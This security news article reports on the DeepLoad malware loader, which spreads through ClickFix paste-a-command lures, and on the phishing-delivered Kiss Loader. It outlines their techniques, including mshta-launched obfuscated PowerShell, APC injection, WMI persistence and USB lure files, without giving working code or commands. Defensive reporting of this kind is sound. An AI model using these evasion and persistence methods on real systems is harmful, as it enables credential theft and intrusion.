DeepLoad Malware Spreads Through ClickFix Social Engineering Campaign
Security researchers have uncovered a new cyberattack campaign using a deceptive tactic known as ClickFix to spread a previously unknown malware loader called DeepLoad.
According to researchers at ReliaQuest, the malware is designed to evade detection using advanced techniques, including AI-assisted obfuscation and stealthy process injection. Even when the main loader is blocked, the attack can still begin stealing user credentials immediately, including saved passwords and active sessions.
How the Attack Works
The attack starts with a fake prompt that tricks users into running a malicious command. Victims are instructed to paste a PowerShell command into the Windows Run dialog, under the false claim that it will fix a system issue.
Once executed, the command uses mshta.exe, a legitimate Windows tool, to download and run an obfuscated PowerShell script.
This script hides its real purpose by mixing malicious code with meaningless variables, making it harder for security tools to detect. Researchers believe AI tools were likely used to generate this obfuscation.
DeepLoad Hides Inside Legitimate Windows Processes
To avoid detection, DeepLoad disguises itself as a normal Windows process. It embeds its payload inside LockAppHost.exe, a legitimate executable responsible for managing the Windows lock screen.
The malware also takes extra steps to stay hidden:
- Disables PowerShell command history
- Uses native Windows functions instead of standard PowerShell commands
- Avoids common monitoring tools that track suspicious activity
Fileless Execution and Advanced Evasion Techniques
DeepLoad avoids traditional detection by generating malicious components on the fly. It uses PowerShell’s Add-Type feature to compile C# code into a temporary DLL file stored in the system’s Temp folder.
Because the file is created dynamically with a random name each time, it becomes difficult for antivirus tools to detect based on file signatures.
Another key technique used is APC (Asynchronous Procedure Call) injection, which allows the malware to run inside trusted processes without writing its payload to disk. This method helps it bypass many security defenses.
Credential Theft and Browser Hijacking
DeepLoad is built to steal sensitive data from infected systems. Its capabilities include:
- Extracting saved browser passwords
- Capturing login credentials in real time
- Installing a malicious browser extension that continues spying on user activity
The browser extension remains active across sessions unless manually removed.
USB Propagation and Silent Reinfection
One of the more dangerous features of DeepLoad is its ability to spread through USB drives. When a removable device is connected, the malware copies itself using deceptive file names such as:
- ChromeSetup.lnk
- Firefox Installer.lnk
- AnyDesk.lnk
These files are designed to trick users into launching the malware again.
DeepLoad also ensures persistence using Windows Management Instrumentation (WMI). Even if the system appears clean, the malware can silently reinfect it after a few days without any user interaction.
Another Threat: Kiss Loader Delivered via Phishing Emails
In a separate report, researchers identified another malware loader called Kiss Loader, which is distributed through phishing emails.
The attack uses malicious URL shortcut files that connect to remote resources hosted on TryCloudflare. These files download additional payloads disguised as PDF documents.
Once executed, the infection chain:
- Runs a script that displays a fake PDF
- Establishes persistence on the system
- Downloads the Python-based Kiss Loader
- Deploys Venom RAT using APC injection
It remains unclear how widespread these attacks are, but the threat actor behind Kiss Loader has claimed to operate from Malawi.
Final Takeaway
DeepLoad highlights how modern malware is evolving. Instead of relying on obvious malicious files, attackers are now:
- Blending into legitimate system processes
- Avoiding disk-based detection
- Using AI to make malware harder to analyze
- Spreading quickly across devices and networks
This shift makes traditional security tools less effective and increases the need for behavior-based detection and user awareness.